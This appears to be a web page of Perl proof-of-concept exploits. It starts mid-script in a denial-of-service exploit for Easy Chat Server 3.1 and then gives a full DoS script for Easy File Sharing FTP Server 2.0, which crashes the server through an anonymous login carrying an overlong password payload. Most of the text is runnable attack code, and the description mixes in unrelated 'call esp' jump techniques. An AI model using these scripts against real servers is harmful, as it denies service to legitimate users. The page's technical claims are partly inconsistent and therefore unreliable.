"&password=&room=2 HTTP/1.1\r\n";<br />$buffer .= "User-Agent: Internet Explorer/4.0\r\n";<br />$buffer .= "Host: $ip:$port\r\n";<br />$buffer .= "Referer: http://$ip\r\n";<br />$buffer .= "Connection: Keep-Alive\r\n\r\n";<br /><br />print("[+] Exploiting...\n");<br />my $socket = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br />) or die "Could not connect! Error: $!\n";<br /><br />$socket->send($buffer);<br />close($socket);<br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "#################################################################\n";<br /> print "# Easy Chat Server 3.1 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "#################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use Net::FTP;<br /><br /># Exploit Title: Easy File Sharing FTP Server 2.0 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 04 January 2024<br /># Download to demo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing<br /># Notification vendor: Not reported<br /># Tested Version: Easy File Sharing FTP Server 2.0<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not correctly handle the amount of data or bytes of the password entered by the user.<br />#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> # $^O is "MSWin32" on Windows, not "windows"<br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... 
\n";<br /><br /> my $payload = "\x2c";<br /> $payload .= "A"x2000;<br /> $payload .= "\x41"x610;<br /><br /> my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";<br /><br /> $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!"; <br /><br /> $ftp->quit;<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "######################################################################\n";<br /> print "# Easy File Sharing FTP Server 2.0 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "######################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>